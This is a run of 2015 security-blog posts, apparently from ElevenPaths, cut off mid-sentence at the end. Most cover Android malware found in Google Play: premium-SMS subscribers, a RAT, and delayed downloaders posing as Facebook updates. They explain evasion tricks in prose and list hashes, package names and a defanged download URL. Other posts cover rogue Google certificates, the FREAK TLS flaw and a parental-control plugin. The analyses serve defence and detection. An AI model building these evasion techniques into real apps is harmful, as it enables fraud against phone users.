point out here are: New methods to communicate have been used. Apps have been undetected for researches/antiviruses for almost six months. The attacker has been in Google Play (best place ever for attackers) for more than a month. And it will still get more victims, because the app is still in a lot of different markets. Is not usual to have "RATs" in Google Play. One of the last news were the detection of Dendroid, a RAT system designed to evade Google Play filters, a year ago. Some different hashes (aside from the ones ESET found) are: 7a131e44d731995e51b7e439082273abbbf02602 48412835d0855c565f213242b0db7a26480fcc2e 4c9e505f1132528c68091fa32bb1844d7cbd2687 31a645973554b7c83cc0bd6fb7709ec12937c962 The attacker is distributing (aside from other markets) the apk from here: hxxp://guangzhouhan1.dothome.co.kr/music.apk, so it may change in any minute. Sergio de los Santos ssantos@11paths.com @ssantosv
30 de marzo de 2015
Control Parental con Latch
Uno de los plugins participantes en el primer concurso de plugins innovadores y de utilidad para Latch, fue el plugin de Latch para Firewall. El plugin fue desarrollado por Ignacio Cabra. Este plugin permite proteger las conexiones, tanto salientes como entrantes, con las que interactúa la máquina. Lo interesante de este plugin es que puede utilizarse como un control parental con el que evitar que los niños se conecten a sitios web inadecuados. El plugin está disponible en Github para que cualquier persona lo pueda descargar, revisar el código e instalar y proteger sus conexiones. Nosotros pensamos en llevar a cabo un control parental básico con este plugin y como prueba de concepto realizamos este escrito. Tras la instalación del plugin se disponen de dos piezas fundamentales para el funcionamiento del mismo, la primera es el servicio core y el segundo es el cliente que se comunica con el core. El core es el que se encarga de gestionar las conexiones y verificar el estado del Latch según las reglas configuradas desde el cliente. El uso del plugin es muy sencillo. En primer lugar hay que dar de alta una aplicación en el Área de Desarrolladores de Latch . Una vez creada la aplicación, se obtiene un AppID y un Secret. Estos datos son fundamentales, ya que el cliente Latch Firewall tiene un apartado de gestión dónde se indicarán estos parámetros. Una vez se tienen estos datos, tan sólo hay que parear la aplicación con nuestra app de Latch en el móvil. Ventana de alta de Aplicación en Latch Firewall Al abrir la Aplicación, encontramos un botón con el texto Latch Management, dónde podremos llevar a cabo la configuración de la herramienta. El pareo lo realizamos desde esta ventana, como puede verse en la imagen. En la pantalla principal de la aplicación, podemos encontrar un botón para añadir reglas. Cuando pulsamos en Add se debe configurar los siguientes parámetros: Tipo de conexión, de entrada, salida o ambas. Dirección IP origen. Si la dejamos en blanco, sería cualquier dirección IP origen. Esto puede ser útil cuando la IP es dinámica o privada. Dirección IP destino. Puerto origen y destino. Si dejamos el valor en 0 sería cualquier puerto. Tipo de protocolo. Se puede elegir entre TCP o UDP. Comentario. Algo descriptivo que nos ayudará a identificar la regla en el cliente. Inserción de regla en la Aplicación El Operation ID se debe introducir para indicar con qué operación de Latch se asignará esta regla. Una vez configurados todos estos campos, se puede observar en el panel central de la aplicación cliente de Latch Firewall que, la regla se ha generado correctamente. Ventana de resumen de reglas a aplicar Ahora, cuando un usuario, por ejemplo un niño, quiera acceder al contenido que se encuentra en esa dirección IP, no podrá acceder. Esto permite, que en este caso, el padre pueda proteger la navegación por la red de su hijo mediante reglas de Firewall. Y gracias a Latch, evitará la visualización de contenido no apropiado para su hijo. Si por el contrario, decidiera habilitar la visualización del contenido, podría hacerlo simplemente "abriendo" el pestillo. En la siguiente imagen, podemos ver como cerrando la operación “anti-obsceno”, se evita que cualquier usuario que intente acceder a la dirección IP fijada en la regla anterior pueda hacerlo. Se pueden añadir más operaciones, cada una enlazará con una regla en el cliente. En Latch podremos habilitar algunas reglas o bloquear todas las reglas con el Latch de botón grueso. Latch y la Aplicación de control parental En el ejemplo, podemos ver como se bloquea solo la operación “anti-obsceno” y se notifica al usuario de Latch que se ha intentado acceder a un contenido prohibido. Es muy fácil incorporar un control parental de navegación gracias a Latch y el plugin implementado por Ignacio Cabra. Detección de intento de acceso a un sitio prohibido Este es sólo un ejemplo de las miles de cosas que podemos integrar con Latch. Desde ElevenPaths te damos las gracias Ignacio, por tu participación en el concurso. Es un plugin muy útil para todos aquellos que necesitan o quieren tener un control parental sobre la navegación de hijos, empleados, etc. Pablo González @pablogonzalezpe
27 de marzo de 2015
Más certificados falsos de Google: Y van tres veces en poco más de un año
Adam Langley, el experto en SSL y criptografía residente de Google, anunciaba hace unos días que se han vuelto a emitir certificados para dominios pertenecientes a Google, pero que no son oficiales. Es necesario revocarlos y dar una explicación de cómo y por qué se han emitido, pues según se mire, puede quedarse en una anécdota o convertirse en un desastre. Pero en cualquier caso, siempre es un problema y acentúa la sospecha sobre el modelo de confianza que se arrastradesde hace tiempo. Veamos los detalles. Qué ha pasado Según Langley, la empresa egipcia MCS Holdings, que opera bajo la China Internet Network Information Center (CNNIC) estaba emitiendo estos certificados. Cualquiera puede emitir certificados para cualquier dominio, el problema es que en este caso, cualquier navegador va a confiar en estos en concreto porque ese certificado CNNIC viene incrustado como raíz de confianza en Windows y otros sistemas operativos. ¿Resultado? El navegador no se quejará si eres redirigido y se va a un (por ejemplo) google.com falso. Certificado de CNNIC entre los certificados raíz de confianza, último responsable de los certificados falsos ¿Seguro que no se quejará? Bueno, esto no es del todo cierto. Aquí es donde empiezan a ser útiles las tecnologías de certificate pinning que están empezando a desarrollar todos los navegadores. Si la implementan, sí que se quejarían, porque recordarían que la cadena de confianza ha cambiado. En un sistema "interceptado", la cadena de confianza, en vez de apuntar al proveedor raíz de Google "habitual", ahora lo haría a la entidad China... y ante ese cambio, no dejaría pasar al usuario. Y es bajo estas circunstancias donde el pinning como capa de seguridad adicional está demostrando ser más que útil. Porque este es un incidente muy parecido al que ocurrió en julio de 2014, también con dominios de Google y la la organización gubernamental National Informatics Centre (NIC) de India, que manejaba varias CA intermedias. También es muy similar a la situación que ocurrió con el gobierno francés en enero de 2014. De hecho, es la sexta vez desde 2011 que ocurre algo parecido y la tercera en poco más de un año. ¿Qué explicaciones se han dado? En general, "las de siempre": se quería espiar a ciertas personas bajo control, y se dispuso un proxy intermedio. Pero se configuró mal. Cuando se pidió explicaciones al CNNIC, respondió que el acuerdo con MCS Holdings incluía simplemente creación de certificados para dominios generados por la propia MCS Holdings, o sea, el uso normal. Pero no se quedaron ahí. Al parecer han emitido certificados para otros dominios y configurado un proxy para espiar a los usuarios que pasen con él (no se sabe en qué entorno). Para colmo, la clave privada quedó en el proxy para generar nuevos dominios. Esto no está permitido. ¿Y si alguien tiene acceso a ese sistema? Las claves de generación se deben almacenar en hardware especial seguro. Pues no se aclara si a través de un robo, descuido, o si ha sido intencional, pero alguien con acceso a ese proxy ha emitido certificados para Google y probablemente otros dominios. Certificado intermedio que emitió los certificados hoja falsos En resumen, CNNIC confió en alguien que obviamente no estaba ni técnica ni "moralmente" capacitado para custodiar un certificado intermedio. Y ese será siempre el problema. ¿Es grave? Detalle de uno de los certificados falsos emitidos Es posible que esos certificados nunca hayan salido de su entorno. De lo contrario, ese sería el problema. Si han salido,en todo caso, ya hemos hablado que el pineo podría venir al rescate. Además, l os certificados están revocados y Google ha emitido CRLSets actualizados para Chrome que actúan automáticamente sobre el navegador. Los CRLSets son un método "rápido" de revocación que utiliza Chrome, como ellos mismos dicen, para"situaciones de emergencia". Son un conjunto de certificados que se aglutinan de información de otros CRLs, se descargan de un servidor, y son procesados por Chrome. Aunque el método es absolutamente transparente, la gestión de qué certificados van en la lista es totalmente opaca. No se sabe con qué certificados lo actualizan (a menos que se averigüe por otro lado). Para saber qué conjunto de CRLSets está descargando Chrome en este momento, lo más cómodo es usar este programa, creado en el lenguaje Go. También hay que tener en cuenta que el certificado intermedio caduca en pocos días, el 4 de abril. Por último, si eres paranoico, deja de confiar en CNNIC y mueve su certificado a la parte de "no confiable". Seguro que no lo notas. Sergio de los Santos ssantos@11paths.com @ssantosv
25 de marzo de 2015
More apps in Google Play subscribing to SMS premium numbers: JSSMSers
After finding the JSDialers, we should have divd it out. The attackers are using the exact same technique as in JSDialers to spread apps that subscribe the victims to SMS premium numbers. This way they have avoided Google Play protection systems and used new techniques based on JavaScript, more dynamic and smart. They are not statically detected by antivurs engines yet. Let's see how they work. We have found 14 apps with the same behavior in Google Play that, with different pretexts (from jokes to recipes) subscribe the user to premium SMS numbers. Although the apps show a message about the subscription, t hey send an SMS by themselves confirming the subscription in a transparent way, so the user does not notice anything. The attacker got more than 100.000 downloads. Not all downloads translate into direct subscriptions because the attackers only allow important carriers from Spain, and if the device does not match with these conditions, the app will act normally. What the user perceives When the user downloads and installs any of these apps, something like this will be shown. This is what the users sees if it belongs to the right carrier and country It is true the attacker is really advising the user: you are going to be subscribed, but it automatically will send the SMS leaving no trace on the phone. In previous apps like this, the button used to be less explicit (maybe "Accept" or asking for your age) but at this point, the attackers used "Subscribe" which should make the users more aware about the problem. The app will check if the device belongs to the right carrier and comes from Spain. By now, two different SMS have been sent, one to start the subscription and another to confirm it, but the user will notice nothing. JavaScript code to check for carrier and country What happens and how it works? The whole program is launched under a WebView, and calls an index file that comes with the apk itself. When the two SMSs are sent, the apps use and interesting trick. T hey dynamically load the receiver to intercept the incoming messages. Usually, these receivers are declared in AndroidManifest.xml. Why dynamically? Possibly to avoid static analysis. Although the app has the permission of intercepting SMSs, a sandbox or analyst will think the developer does not really use it, because it lacks any routine to manage them. But the real thing is that it loads it only if and when necessary. The receiver works when the device receives a message, and makes the app mark it as "already read" so the user does not notice any welcome message to the subscription service. Dynamic receiver to handle incoming SMSs So, what is new? There are several interesting parts on these apps. First, the use of JavaScript and Cordova (the bridge between JavaScript and the apk) to send messages and avoid introducing code in the app itself. This takes the whole logic to the server, what makes it more powerful, dynamic and undetected. Loading the receiver dynamically, may confuse a static analysis. The receiver is only declared under the right circumstances (right carrier and country) so it makes it stealthier. Aside, the receiver is loaded (and it may be unloaded too) via the JavaScript code, so it will only be listed if all conditions are satisfied in a dynamic analysis. It does not use the usual system to send messages, but gives them directly to SMSProvider. This avoids the sent messages to be kept in "sent" or "outbound" folder. It provides the SMS text directly to the operative system provider. Marking the incoming SMS as already read Other apps like these Who is behind these apps? Obviously they are related to the JSDialers we talked about a few weeks ago. The subscription company and domains just give us the right answers. Screenshots of some of the apps we have found thanks to Tacyt, are these: Some of the apps with this behevior This is the title, packagename, and hash of the applications found. Frases celebres bonitas cortas,com.thinkking,1e8568ccc54be7a73934965e97ff7e3fd9e4fec3 Imagenes amor fotos frases,com.romaticpost,2d26c676bcb5a5f8599f49a5b90599b7ff93dc11 Phrrasesfee,com.prasesfee,ca6ac2e1bf46087455fda358870070ec269faae6 Statetss,com.statetss,da045796efc737d42b9e86876ec5b854289212bc New mensajes navidad y frases,com.navidad.extra,18db1cfb7e7340a5476a5c6e17f1f9d596045095 Postales perritos fondos,com.imagepets,bbc6e386281f2b1931ff2be7812bf4de4530d3fe Funnyys,com.funnyys,9fc9e237903b02a2a47701139200c9177eec16a5 Fotos frases amor postales,com.prasesamor,65ce3043fc249cb906b4e50a23d581d5c70819fa Gatitos tiernos fondos postal,com.cattss,f68ef39f5183da0745614c68a7ae135085298b54 Recetas de cocina dietas Salud,com.kitchenn,7fa17bed794a59dd3d914d05535fe25a357ab1cd Chistes cortos buenos,com.chistescortos,daac73a325485f882b1dcda9758b16bb5f407770 Chistes Picantes buenos cortos,com.chistespicanticos,dc799bcc3f1f623e211e50fbb6ececb2e64753a6 Laughtter,com.laughtter,f569baf1c0f12c137a09e084c879979bbcfd11e1 Healthyy,com.recipesmart,0dd97d056fa7559a2cdb35d45850cefd400f4d6f Sergio de los Santos ssantos@11paths.com @ssantosv Juan Manuel Tirado juanmanual.tirado@11paths.com
23 de marzo de 2015
Más apps en Google Play que suscriben a mensajes SMS premium: JSSMSers
Después de encontrar los JSDialers, deberíamos haberlo predicho. Los atacantes están usando exactamente la misma técnica que en los JSDialers para esparcir apps que suscriben a las víctimas a servicios de SMS premium. De esta forma han eludido los sistemas de protección de Google Play, y utilizado técnicas basadas en JavaScript, más dinámicas e inteligentes. Todavía no son detectadas estáticamente por los motores antivirus. Veamos cómo funcionan. Hemos encontrado 14 apps con este mismo comportamiento en Google Play que, con diferentes pretextos, (desde chistes a recetas), subscriben al usuario a servicios de mensajes SMS premium. Aunque las apps muestran un mensaje sobre la suscripción, e nvían por sí mismas el SMS de conformación de suscripción de forma transparente, para que el usuario no note nada. Los atacantes han obtenido más de 100.000 descargas. No todas las descargas se traducen en suscripciones directas porque los atacantes solo funcionan bajo los operadores más importantes de España, y si el dispositivo no cumple con estos requisitos, la app funcionará normalmente. Lo que percibe el usuario Cuando el usuario descarga e instala estas apps, se muestra algo así. Esto es lo que ve el usuario si pertenece al operador y país adecuado Es cierto que el atacante está realmente avisando al usuario: se te va a suscribir, pero los mensajes de confirmación serán enviados de forma automática sin dejar rastro en el teléfono. En apps con un comportamiento parecido y analizadas previamente, el mensaje aparecido en el botón podría ser menos explícito (quizás "Aceptar" o preguntar por la edad), pero en este punto, los atacantes han usado la palabra "Suscribir", que debería alertar a las potenciales víctimas. La app comprobará si el dispositivo pertenece al operador correcto y que viene de España. Para ese momento, ya se han enviado dos SMS diferentes, uno para comenzar el proceso de suscripción y otro para confirmarlo, sin que el usuario note nada. Código JavaScript para comprobar operador y país ¿Qué ocurre y cómo funciona? Todo el programa se lanza bajo un WebView, que llama a un fichero index que viene con la propia apk. Cuando los dos SMS se envían, las apps utilizan un truco interesante. Cargan y descargan dinámicamente el "receiver" para interceptar los mensajes entrantes. Normalmente, estos receivers se declaran en el AndroidManifest.xml. ¿Por qué dinámicamente? Posiblemente para eludir los análisis estáticos. Aunque la app tenga el permiso de interceptar mensajes, una sandbox o un analista podrían pensar que el desarrollador realmente no hace uso de él, porque carece de la rutina para manejar el evento. Pero lo cierto es que lo carga solo si es necesario y cuando lo necesita. El receiver funciona cuando el dispositivo recibe el mensaje, y hace que la app los marque como "ya leídos", para que el usuario no se percate del mensaje de bienvenida al servicio de suscripción. Receiver dinámico para manejar SMSs entrantes ¿Entonces, qué es nuevo? Hay varias partes interesantes en estas apps. Primero, el uso de JavaSCript y Cordova (el puente entre JavaScript y el apk) para enviar mensajes y evitar introducir esa parte de la lógica en la propia aplicación. Esto lleva la lógica al servidor, lo que la hace más poderosa, dinámica, y difícil de detectar. Cargar el "receiver" dinámicamente, que confundirá a los análisis estáticos. El receiver se carga y descarga a su antojo bajo las circunstancias adecuadas (país y operador) lo que lo hace más sigiloso. Además, la carga o descarga se hace también por JavaScript, por lo que solo se listará si las circunstancias son las adecuadas en un análisis dinámico. No utilizan el sistema "habitual" para el envío de mensajes, sino que se los proporciona directamente al SMSProvider. Esto evita que los mensajes enviados se mantengan en la carpeta de "enviados" o "salida". Las apps proporcionan el texto de los SMS directamente el proveedor del sistema operativo. Marcando los mensajes SMS entrantes como ya leídos Otras apps como estas ¿Quién está detrás de estas apps? Obviamente están relacionadas con los JSDialers de los que hablamos hace unas semanas. Las compañías de suscripción y dominios nos proporcionan las pistas adecuadas. Algunas capturas de las apps que hemos encontrado gracias a Tacyt, son estas: Algunas apps con este comportamiento Este es el título, nombre de paquete y hash de las apps encontradas: Frases celebres bonitas cortas,com.thinkking,1e8568ccc54be7a73934965e97ff7e3fd9e4fec3 Imagenes amor fotos frases,com.romaticpost,2d26c676bcb5a5f8599f49a5b90599b7ff93dc11 Phrrasesfee,com.prasesfee,ca6ac2e1bf46087455fda358870070ec269faae6 Statetss,com.statetss,da045796efc737d42b9e86876ec5b854289212bc New mensajes navidad y frases,com.navidad.extra,18db1cfb7e7340a5476a5c6e17f1f9d596045095 Postales perritos fondos,com.imagepets,bbc6e386281f2b1931ff2be7812bf4de4530d3fe Funnyys,com.funnyys,9fc9e237903b02a2a47701139200c9177eec16a5 Fotos frases amor postales,com.prasesamor,65ce3043fc249cb906b4e50a23d581d5c70819fa Gatitos tiernos fondos postal,com.cattss,f68ef39f5183da0745614c68a7ae135085298b54 Recetas de cocina dietas Salud,com.kitchenn,7fa17bed794a59dd3d914d05535fe25a357ab1cd Chistes cortos buenos,com.chistescortos,daac73a325485f882b1dcda9758b16bb5f407770 Chistes Picantes buenos cortos,com.chistespicanticos,dc799bcc3f1f623e211e50fbb6ececb2e64753a6 Laughtter,com.laughtter,f569baf1c0f12c137a09e084c879979bbcfd11e1 Healthyy,com.recipesmart,0dd97d056fa7559a2cdb35d45850cefd400f4d6f Sergio de los Santos ssantos@11paths.com @ssantosv Juan Manuel Tirado juanmanual.tirado@11paths.com
23 de marzo de 2015
SMACK TLS y el ataque FREAK
Últimamente, las vulnerabilidades sobre TLS/SSL están dando mucho de qué hablar. El pasado 23 de febrero realizábamos un repaso de las incidencias que pueden catalogar el servicio SSL/TLS de inseguro según su implementación y configuración. En esta ocasión, os explicaremos la vulnerabilidad FREAK (Factoring RSA Export Keys) haciendo hincapié en el impacto que ha tenido, destacando la implicación de miTLS con el proyecto y la investigación de SMACK. SMACK: State Machine AttaCKs El proyecto de los investigadores de miTLS, se basa en analizar los comportamientos de las distintas implementaciones de SSL/TLS, gracias a esa investigación se han descubierto vulnerabilidades como SKIP-TLS o FREAK, que se explicarán más adelante. Dado que el control del momento de la conexión se gestiona a través de una máquina de estados, este ataque se ha denominado state machine attack. Ilustración 1: Logotipo del proyecto SMACK La vulnerabilidad SKIP-TLS se sostiene en la mala implementación de TLS, que permite omitir algunos pasos o campos durante el saludo e intercambio de información entre cliente-servidor. Un ejemplo de esta vulnerabilidad es la implementación en cliente de JSSE, la cual permite abreviar el saludo SSL/TLS y omitir algunos pasos esenciales para la selección del cifrado, permitiendo al atacante enviar únicamente el certificado y omitir el resto de pasos de la comunicación. En caso de que el cliente acepte la conexión, esta se realizara sin cifrado alguno, por lo que la conexión no posee autenticación, integridad ni confidencialidad. FREAK (Factoring RSA Export Keys) FREAK afecta a diferentes productos y está siendo más común de lo que en un principio se esperaba, a día de hoy posee múltiples CVE para los productos más conocidos como OpenSSL (CVE-2015-0204), Schannel(CVE-2015-1637) en el caso de Microsoft y la implementación de TLS de Apple(CVE-2015-2235). Dicha vulnerabilidad surgió con el miedo de EEUU de exportar cifrados que no pudiesen ser descifrados por ellos, por lo que se forzó que los cifrados EXPORT se usasen con una clave RSA igual o inferior a 512, lo que en la década del 90 era considerada una longitud robusta y suficiente. Por otro lado, a día de hoy, se puede obtener la clave en un tiempo razonable con servicios de cloud computing, los cuales, son capaces de extraer la clave en menos de 12 horas. Un tiempo más que asumible ya que generar una clave RSA es un proceso relativamente costoso y por ejemplo mod_ssl en Apache no genera la clave RSA por cada conexión, únicamente la genera al iniciarse, lo que significa que un atacante recupera la clave RSA y una vez descifrada, puede usar la clave con todas las sesiones que quiera y suplantar la identidad del servidor hasta que este se reinicie y genere una nueva clave. ¿Cómo puede afectar esto a nivel de servidor? Esta vulnerabilidad se resume en que si el servidor implementa alguno de los cifrados EXPORT comentados, un posible atacante podrá recuperar la clave RSA para a posteriori interceptar la comunicación entre cliente y servidor usando técnicas de tipo Man in the Middle, y dado que, el atacante es capaz de cifrar y descifrar toda la conversación, el cliente no será advertido en ningún momento, perdiendo la integridad y la confidencialidad de la información. Comprobar el soporte de los cifrados EXPORT en el servidor se puede realizar de forma sencilla con el cliente de OpenSSL: openssl s_client -connect domain.com:443 -cipher EXPORT Este proceso se puede ejecutar con diferentes herramientas y scripts, por otro lado si eres cliente de Faast, en el próximo escaneo aparecerán los servidores vulnerables y a través de la evidencia podrás observar que conjuntos de cifrados se deben deshabilitar. Ilustración 2: Evidencia de la vulnerabilidad FREAK a través de la interfaz web de Faast ¿Cómo me afecta esto como usuario? Es importante tener claro que, a pesar de que el servidor sea vulnerable, el cliente debe tener implementados los cifrados EXPORT para poder conversar con el servidor e intercambiar la misma clave RSA que el atacante ya tiene descifrada. Si utilizas un navegador antiguo, es altamente recomendable actualizar a la última versión tanto en las aplicaciones de escritorio como en los dispositivos móviles para evitar que toda la información enviada pueda ser interceptada por un atacante. Ilustración 3: Comprobación de FREAK en la aplicación de Google Chrome de escritorio Ilustración 4: Google Chrome 40 en Android 5.0.1 se muestra vulnerable Sin olvidar que, como desarrolladores, las librerías que se utilizan para hacer peticiones como wget o curl, también deben ser actualizadas para evitar ser afectadas por este tipo de problemas de seguridad. En resumen... En este momento el sitio web de FREAK recopila información del avance de esta vulnerabilidad en la red. En el momento de publicarse el CVE, el 12.2% de los dominios de Alexa se veían afectados, ese porcentaje va descendiendo progresivamente, aunque según las estadísticas el 36.7% de los servidores HTTPS con certificados validos tienen cifrados RSA_EXPORT y por tanto son susceptibles al ataque FREAK. Para mitigar la vulnerabilidad al igual que paso con Poodle y los cifrados de bloques CBC y otras similares, es recomendable actualizar la versión del servidor/cliente y dejar de implementar los cifrados EXPORT. Óscar Sánchez oscar.sanchez@11paths.com
12 de marzo de 2015
Sinfonier Meetup: Encuentro para analistas de seguridad
Tras el éxito de convocatoria del primer Sinfonier Meet up celebrado en Diciembre, en el que se mostraron casos de uso de la tecnología centrados en las necesidades de analistas de seguridad informática, llega ahora un segundo encuentro. Toma nota y guarda en tu agenda el próximo día 17 de marzo a las 18:30 horas. No olvides registrarte en la web para tener uno de los sitios que hay disponibles en el Auditorio de FlagshipStore de Telefónica, situado en el número 28 de la Gran Vía madrileña, y asistir a este evento. Este segundo encuentro estará al cargo de nuestros compañeros Jesús Gómez y Mariano González Espín, quienes nos contarán las últimas novedades y donde se profundizará en cómo desarrollar módulos y diseñar topologías en Sinfonier. Si quieres saber más sobre Sinfonier Project, te recomendamos que sigas el proyecto en la web y en su blog oficial.
3 de marzo de 2015
"Not today downloaders": New downloaders techniques in Google Play
Downloaders are not new in Android, but lately, they are getting more and more important for attackers as a method to avoid Google Play barriers and malware detection. In Eleven Paths we have detected downloaders that, under the appearance of innocent apps, are able to download a much more dangerous apk (literally, anything). It needs user interaction and the "install from unknown sources" checked, but the trick it uses to fool the victim is quite ingenious, and allows a second app to run without the user associating the future problems to the first one installed. Let's see how. Downloaders are an old trick in PC and relatively not new in Android. These apps try to "find their way" to the victim, using less permissions, or even giving whatever feature they promise. This is how they get to Google Play. Then, in some future version, once they are consolidated in the market, they mutate. They become downloaders of some other much more complex adware or malware. Attackers are much more successful with these techniques. There are lots of techniques. Let's see a new one. How it works The apps we have found are not very detected by antivirus yet and, if they are, is mostly because of the aggressive ad techniques it uses, not for the download technique itself. Even a lot of them are still in Google Play. We are analyzing this one, which is still online. One of the downloaders in Google Play It is supposed to be a voice changer, and it indeed is, just saving a .wav file and modifying the frequency of reproduction. The app itself has three different SDKs from three different ad providers. This means the downloader itself floods the device with aggressive ads. But that is not enough... The app declares a receiver called "USER_PRESENT". USER_PRESENT receiver, to activate when the user unlocks the device This an official event that is launched every time the device "wakes up" by an user, in other words, basically when it is unlocked. This is the code when the event is received: Code activated when the telephone is unlocked Basically, what the app is doing is assuring that it has connectivity. Then it checks that is only launched once a day. This happens even when we are "out of the app". The app counts the times (with "k" variable) it has been executed and stores it in its preferences. Downloading... but not today The app does not download anything the same day the downloader has been installed. So it will avoid any "dynamic analysis". The user will install this voice changer, but will not notice anything strange until, at least, the next day. And then, the next day, another check is done. Every 2 out of 3 times it will visit the URL shown in the image. There, a txt file is pointing to some other app in Google Play, so the developer floods with "ads" the screen. But the interesting part occurs when the app does not enter in this "if" clause and goes down the code. This method Gfveaqwfea checks for the existence of com.facebook app. It is not the official Facebook app (it is com.facebook.katana), but the adware that will be installed. Checking if com.facebook exists, and if not, downloading the new app The app checks if the device is ready to install apps from outside Google Play. This is very common in certain countries where the use of Google Play is limited. It is a common configuration as well as in the user's devices that like to install "unofficial" apps, so it will be very successful in these scenarios. If so, a.apk is downloaded from the URL and saved as xxx.apk. Checks for "install from outside Google Play" permission. If available, it tries to download the new apk The new apk in the "Download" folder The user will see nothing and no question will be made. Then it is launched. Depending on the configuration of the device, if the user has associated automatically the execution to Verify Apps or Install Directly, an app selector will be shown or not. When this second app is being installed, this is what the user will see: Looks like a legitimate Facebook update It is important to remember that this image will appear when the user unlocks the telephone, the day after the original app was installed, and only 1 out of 3 times until it is installed... so it is very unlikely that the user associates the first installation of the "voice changer" for example, with this "update" that seems like a legitimate installation/update of Facebook. The icon is quite similar and the name makes it even more messy. Downloader general scheme This new downloaded app may be literally anything. In this case is impersonating Facebook and the icon disappears just a second after being installed. If the user has the real Facebook, he or she will think Facebook is just updating itself, and probably will forget about it. But the real thing is that a very aggressive adware has been installed by the user with this "social engineering" trick. The icon of the fake Facebook will disappear Conclusions Attackers are getting more and more specialized right now in getting an app reaching to Google Play, and transforming it into adware/malware in the long term. This long term operation will give them more victims and we are detecting this pattern more and more in malicious apps. The trick about executing the app only when the telephone is unlocked, gives it an extra of "credibility" to the victim. With Path5, we have found the person behind these apps (a Polish programmer). He has been operating since late 2014. There are right now about 20 apps like this still up in Google Play, from more than 100 from this same developer that have been in Google Play lately. The app we have just analyzed here is us.free.voice.changer.funny.voices.lolapps, with SHA1: c0eb7cde5a1b3818a1d7af2f580f8ea3fa1e8d61 The ones that seems to be from the same person, using the same techinque, and still online, are these: TV remote controller, us.tv.remote.pilot.television.free.tool2, 88287f102bbd9cf3a3e5e7601b5bc8ee760d4525 Faster Wifi PRANK, us.phonehelper.wifi.booster.free, 74b2cc8d95c001832a4d4fb11ea3cb9638daf5e8 Visión nocturna gratis, us.night.vision.nightvision.free.useit, 1606ce1f616e3ba29ac021e4ce1ac1cb5e84b7a4 Funny voice changer, us.free.voice.changer.funny.voices.lolapps,c0eb7cde5a1b3818a1d7af2f580f8ea3fa1e8d61 Fake phone call, us.free.fake.call.caller.lolapps, 3b0a2b88effd264235e75984cea3bc77a6304e8b Fake connection, us.fake.call.caller.free.usapps, 2f3c8a8cd1e5ecdad0e348484c72f25aff45d755 Faster internet PRANK, us.phonehelper.internet.booster.free, c2b083d0ce9d13e8df2f680f2901cd54778d385e Increase battery life PRANK, us.phonehelper.battery.booster.free, 4890c7437268b65ef376515047c13e0eecffdd9a Funny voice changer, us.free.voice.changer.funny.voices.lolapps, a97c7f6669c41ead0ba54928ebe2cad5ba706bc5 Transparent phone HD, us.transparent.screen.diaphanous.phone.lolapps, 64e44c0d234f96eff5f0e44305d25b35242b0e51 Flash-Player installation, us.flashapps.free.flashplayer, 9f0c9145f2a265d476b936830fa9dde3d024eab6 Diáfano teléfono (gratis),us.transparent.screen.diaphanous.phone.free.smartools,c6c2617f7cf512669f553876939e5ca367c9e746 Increase volume sound PRANK, us.phonehelper.sound.booster.free, 3e360ee39146cbd834280c18d656e3e9f6d0df2f Termómetro electrónico gratis, us.digital.electronic.thermometer.free.measure.temperature.temp, 722f7f2c10c4b656ded858cf9f91a8c55ea226b6 Ski jumping 2015, us.ski.jumping.free.game.full.sportgames, 638a1c331e76bec73b1a46a451e4d1de6cd20879 FlashPlayer, us.flashapps.free.flashplayer2, 9f7aa1bc90770748681b08e3ee63dcb974195f7a Falsa llamada entrante, us.free.fake.call.caller.smartools, fb9c05094eb1fdcfa8aec07eeff1e95ee7814e76 Increase network signal PRANK,us.phonehelper.signal.booster.free,495b151c5e709bfa50c671c8fb93cbeaee29e025 Control remoto para la TV, us.tv.remote.pilot.television.free.tool, dbfd108973388d6c1a506ac68b79463df8271f5c Fake phone call, us.free.fake.call.caller.lolapps, e96d2ab7d8d0c7990be07bd42b9e9bc079e70f3a Tonos para Navidad, us.christmas.ringtones.free.carols.mp3.ringtonedownloader, fa57543faf60073f56041caee0f1524cfc9f77dd Sergio de los Santos ssantos@11paths.com @ssantosv Juan Manuel Tirado juanmanuel.tirado@11paths.com
27 de febrero de 2015
Downloaders "en diferido": Nuevas técnicas de descarga de apps maliciosas en Google Play
Los descargadores o "downloaders" no son nuevos en Android, pero últimamente, se están volviendo cada vez más importantes para los atacantes, como método que elude las barreras de entrada en Google Play y su detector de malware. En ElevenPaths hemos detectado unos downloaders que, bajo la apariencia de apps inocentes, permiten la descarga de apks más peligrosos (literalmente, cualquier apk). Necesita de la interacción del usuario y que la opción de "instalar de fuentes desconocidas" esté activa, pero el truco que utiliza para engañar al usuario es bastante ingenioso, y permite que la app descargada (la segunda) se ejecute sin que el usuario asocie los futuros problemas que tendrá con la primera app que instaló. Veamos cómo. Los "downloaders" son un viejo truco en el mundo del PC, y algo relativamente no tan nuevo en Android. Estas apps intentan encontrar el camino hacia la victima usando permisos menos sospechosos, o incluso ofreciendo realmente la funcionalidad prometida. Así es como llegan a Google Play. Después, en una futura versión, una vez consolidados en el mercado, mutan. Se vuelven "downloaders" de un adware o malware más complejo. Los atacantes tienen mucho más éxito con estas técnicas. Hay muchas. Veamos una nueva. Cómo funciona Un usuario podría descargar una aplicación aparentemente inocente y, solo un tiempo después, el teléfono descargaría e intentaría instalar, engañando al usuario, otra aplicación completamente diferente: muy probablemente maliciosa (malware, dialers o suscriptores a mensajes premium, etc). Las apps que hemos encontrado no son muy detectadas por los antivirus e incluso, si lo son, es por la carga de adware agresivo que llevan en sí mismas, no por su técnica de descarga. Incluso muchas de ellas todavía se encuentran en Google Play. Hemos analizado esta que todavía se encuentra online. Uno de los downloaders en Google Play Se supone que se trata de un "cambiador de voz" y en realidad lo hace, guardando un fichero .wav y modificando la frecuencia de reproducción. La app en sí misma contiene tres SDKs diferentes de tres proveedores de publicidad distintos. Esto significa que por sí misma inunda el teléfono con publicidad. Pero no es suficiente... esta app declara además un "receiver" llamado "USER_PRESENT". USER_PRESENT receiver, para activarse cuando el usuario desbloquea el dispositivo Este es un evento oficial que se lanza cada vez que el dispositivo "se despierta" por una acción del usuario. En otras palabras, básicamente cuando se desbloquea. Este es el código que se lanza cuando se recibe el evento: Código que se activa cuando el teléfono se desbloquea Básicamente, lo que la aplicación está haciendo es asegurarse la conectividad. Comprueba que se lanza solamente una vez al día. Esto ocurre incluso cuando no se está usando la app. Cuanta (con la variable "k") cuántas veces ha sido ejecutada y se almacena en las preferencias. Downloading... pero no hoy La app no descarga nada el mismo día que el downloader ha sido instalado. Así evitará un "análisis dinámico". El usuario instalará entonces este "cambiador de voz", pero no notará nada extraño hasta, al menos, el día siguiente. Y 